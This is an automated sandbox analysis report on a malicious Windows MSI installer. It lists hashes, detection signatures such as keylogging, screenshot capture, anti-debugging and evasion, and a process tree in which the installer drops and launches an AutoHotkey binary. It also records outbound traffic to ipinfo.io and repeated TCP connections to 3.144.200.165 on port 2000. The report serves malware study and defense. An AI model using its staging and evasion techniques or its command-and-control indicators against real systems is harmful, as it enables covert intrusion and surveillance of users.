Play interactive tour

Edit tour

Windows Analysis Report C003I7GF0S8F920G600203.msi

Overview

General Information

Sample Name:	C003I7GF0S8F920G600203.msi
Analysis ID:	514686
MD5:	2917d9416ab9d90be57da089357592b3
SHA1:	4b6b50bffdcee566e37646f2d17666ef7a39863c
SHA256:	6ace3b241920068501ff00b28a7f8c04242325495eb85279f0a231158b5cd1a9
Infos:
Most interesting Screenshot:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Contains functionality to register a low level keyboard hook

May check the online IP address of the machine

Sample or dropped binary is a compiled AutoHotkey binary

Machine Learning detection for dropped file

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to communicate with device drivers

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Drops files with a non-matching file extension (content does not match file extension)

Sample file is different than original file name gathered from version info

OS version to string mapping found (often used in BOTs)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Found evasive API chain (may stop execution after accessing registry keys)

Contains functionality to retrieve information about pressed keystrokes

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Checks for available system drives (often done to infect USB drives)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to simulate mouse events

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7028 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\C003I7GF0S8F920G600203.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 7072 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 4944 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C48C9974BE223117E013BA6B02E31CE9 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

nMv8.exe (PID: 6680 cmdline: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe MD5: 01F601DA6304451E0BC17CF004C97C43)

WerFault.exe (PID: 6604 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 844 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cmd.exe (PID: 1500 cmdline: "C:\Windows\system32\cmd.exe" /c start C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nMv8.exe (PID: 2388 cmdline: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk MD5: 01F601DA6304451E0BC17CF004C97C43)

cmd.exe (PID: 1556 cmdline: "C:\Windows\system32\cmd.exe" /c start C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nMv8.exe (PID: 3716 cmdline: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk MD5: 01F601DA6304451E0BC17CF004C97C43)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\HPDofzXZkq.dll

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\HPDofzXZkq.dll

Joe Sandbox ML: detected

Source:	Binary string: msiexec.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb3;> source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msi.pdbwk source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.844988826.0000000000D16000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb_ source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: webio.pdb6+ source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.845720418.0000000000D10000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.850878874.00000000052E1000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: C003I7GF0S8F920G600203.msi
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: normaliz.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: idndl.pdbE6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: msi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdb]6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.845443372.0000000000D1C000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb%6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb=6? source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: sxs.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb'; source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb5;0 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbi source: C003I7GF0S8F920G600203.msi
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000012.00000003.850878874.00000000052E1000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.845720418.0000000000D10000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: version.pdbk6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000012.00000003.850878874.00000000052E1000.00000004.00000040.sdmp
Source:	Binary string: webio.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: idndl.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: msiexec.pdbk source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb); source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdbtj source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: netapi32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: netapi32.pdb/6 source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.850878874.00000000052E1000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.845443372.0000000000D1C000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.851076892.00000000052E0000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.844988826.0000000000D16000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb?;* source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: comctl32.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.850916985.00000000051D1000.00000004.00000001.sdmp
Source:	Binary string: netutils.pdb source: WerFault.exe, 00000012.00000003.850889431.00000000052E7000.00000004.00000040.sdmp

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DD788 FindFirstFileW,FindClose,	4_2_049DD788
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_049DD1BC GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	4_2_049DD1BC
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0047F410 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,	14_2_0047F410
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0047F380 FindFirstFileW,FindClose,GetFileAttributesW,	14_2_0047F380
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 14_2_0044CF10 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,	14_2_0044CF10
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0047F410 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,	21_2_0047F410
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_004370C0 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose,	21_2_004370C0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0045D2E0 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,	21_2_0045D2E0
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 21_2_0047F380 FindFirstFileW,FindClose,GetFileAttributesW,	21_2_0047F380
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047BFA00 FindFirstFileW,FindClose,	25_2_047BFA00
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	Code function: 25_2_047BF434 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	25_2_047BF434

Networking:

May check the online IP address of the machine

Show sources

Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	DNS query: name: ipinfo.io
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	DNS query: name: ipinfo.io
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	DNS query: name: ipinfo.io
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	DNS query: name: ipinfo.io
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	DNS query: name: ipinfo.io
Source: C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe	DNS query: name: ipinfo.io

Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)

Source: global traffic

TCP traffic: 192.168.2.4:49766 -> 3.144.200.165:2000

Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165
Source: unknown	TCP traffic detected without corresponding DNS query: 3.144.200.165

Source: msiexec.exe	String found in binary or memory: http://192.168.0.108
Source: msiexec.exe, 00000004.00000000.833698683.0000000000932000.00000004.00000020.sdmp	String found in binary or memory: http://192.168.0.108/
Source: msiexec.exe, 00000004.00000000.838305703.00000000008AA000.00000004.00000020.sdmp	String found in binary or memory: http://192.168.0.108/#n
Source: msiexec.exe, 00000004.00000000.838305703.00000000008AA000.00000004.00000020.sdmp	String found in binary or memory: http://192.168.0.108/lWr
Source: msiexec.exe, 00000004.00000000.838356796.0000000000921000.00000004.00000020.sdmp	String found in binary or memory: http://192.168.0.108:80/
Source: msiexec.exe, 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, C003I7GF0S8F920G600203.msi	String found in binary or memory: http://192.168.0.108U
Source: nMv8.exe	String found in binary or memory: http://chart.apis.google.com/chart?chs=%dx%d&cht=qr&chld=%s&chl=%s
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://chart.apis.google.com/chart?chs=%dx%d&cht=qr&chld=%s&chl=%sS
Source: WerFault.exe, 00000012.00000003.869077181.0000000004C57000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nMv8.exe	String found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS
Source: nMv8.exe	String found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfU
Source: nMv8.exe	String found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS
Source: HPDofzXZkq.dll.4.dr	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: nMv8.exe, 0000000E.00000003.828749486.0000000003318000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868791942.00000000053F8000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888519607.0000000005398000.00000004.00000001.sdmp	String found in binary or memory: http://ipinfo.io/json
Source: nMv8.exe, 0000000E.00000003.828790618.000000000333C000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868839232.000000000541C000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888569578.00000000053BC000.00000004.00000001.sdmp	String found in binary or memory: http://ipinfo.io/jsonK5
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://s.symcd.com06
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://t2.symcb.com0
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://tl.symcd.com0&
Source: nMv8.exe, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://tools.ietf.org/html/rfc1321
Source: nMv8.exe	String found in binary or memory: http://tools.ietf.org/html/rfc4648
Source: nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	String found in binary or memory: http://tools.ietf.org/html/rfc4648S
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: C003I7GF0S8F920G600203.msi	String found in binary or memory: http://www.componentace.com
